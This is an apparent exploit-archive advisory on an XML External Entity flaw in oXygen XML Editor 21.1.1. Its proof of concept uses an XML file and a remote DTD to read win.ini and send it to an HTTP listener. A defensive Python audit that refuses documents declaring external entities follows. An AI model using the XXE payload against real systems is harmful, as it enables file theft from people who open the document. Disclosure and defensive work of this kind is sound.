oXygen XML Editor 21.1.1 XML Injection

2019.11.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Date: 2019-11-13
# Vendor Homepage: https://www.oxygenxml.com/
# Source: https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7

#PoC

1- python -m SimpleHTTPServer 8000

1.1- Poc.xml :

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

1.2- payload.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;

2- File -> Open -> *.xml

#PoC Visual
https://imgur.com/2H8DhL9
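The PoC works because the editor resolves the external parameter entity in the DOCTYPE (fetching payload.dtd) and then the external general entity it defines (sending the contents of win.ini to the listener). The defensive counterpart is to inspect a document's DTD before any component that resolves entities touches it, and to refuse documents that declare external entities at all. The following is an added example written for this page; it is not part of Pablo Santiago's advisory and not oXygen's code. It uses only Python's standard library: expat is left at its default of not loading external parameter entities or the external DTD subset, so the audit itself never fetches anything, and every entity declared with a SYSTEM or PUBLIC identifier is reported. The two sample documents and the host name dtd-host.example are constructed for the example; the second sample mirrors the structure of the PoC's Poc.xml.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document declares entities that would reach the file system or network."""


# Constructed sample documents for this example (not the advisory's files).
BENIGN_XML = b'<?xml version="1.0"?><config><item>ok</item></config>'

# Same pattern as the PoC: a parameter entity pointing at a local file and a
# second one pointing at a remote DTD that would be fetched and expanded.
XXE_STYLE_XML = b"""<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\\Windows\\win.ini">
<!ENTITY % dtd SYSTEM "http://dtd-host.example/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""


def audit_entities(data: bytes) -> dict:
    """Scan the internal DTD subset and report every external identifier.

    Returns {"has_doctype": bool,
             "external_entities": [(name, is_parameter_entity, system_id, public_id), ...],
             "well_formed": bool}.
    Nothing is fetched: expat's default parameter-entity parsing mode is NEVER,
    so the '%dtd;' reference is skipped rather than resolved.
    """
    report = {"has_doctype": False, "external_entities": [], "well_formed": True}
    parser = xml.parsers.expat.ParserCreate()

    def on_start_doctype(name, system_id, public_id, has_internal_subset):
        report["has_doctype"] = True
        # <!DOCTYPE x SYSTEM "..."> is itself an external fetch of the DTD subset.
        if system_id is not None or public_id is not None:
            report["external_entities"].append(("<!DOCTYPE %s>" % name, True, system_id, public_id))

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities have value set and no identifiers; external ones
        # carry a SYSTEM (and possibly PUBLIC) identifier.
        if system_id is not None or public_id is not None:
            report["external_entities"].append((name, bool(is_param), system_id, public_id))

    def on_external_ref(context, base, system_id, public_id):
        # Reached only for external general entity references in content;
        # returning 0 makes expat abort the parse instead of resolving them.
        return 0

    parser.StartDoctypeDeclHandler = on_start_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError:
        report["well_formed"] = False
    return report


def safe_load(data: bytes, allow_doctype: bool = False) -> ET.Element:
    """Parse a document only after the audit finds no external entities.

    By default a DOCTYPE is refused outright (the usual hardening stance, since
    internal entities alone still permit entity-expansion attacks); pass
    allow_doctype=True to accept DTDs that declare no external identifiers.
    """
    report = audit_entities(data)
    if report["external_entities"]:
        names = ", ".join(name for name, _, _, _ in report["external_entities"])
        raise UnsafeXML("external entity declaration(s) refused: " + names)
    if report["has_doctype"] and not allow_doctype:
        raise UnsafeXML("DOCTYPE present and allow_doctype is False")
    return ET.fromstring(data)


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_XML), ("xxe-style", XXE_STYLE_XML)):
        print(label, audit_entities(doc))
        try:
            print(label, "root element:", safe_load(doc).tag)
        except UnsafeXML as exc:
            print(label, "refused:", exc)
```

The audit deliberately runs on the raw bytes before the real parser sees them, which is the same place a file-open hook or an upload handler would call it. The equivalent fix on the product side is a parser configuration that disables external entity and external DTD resolution; this check is the pre-parse gate you can add when you do not control that configuration.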

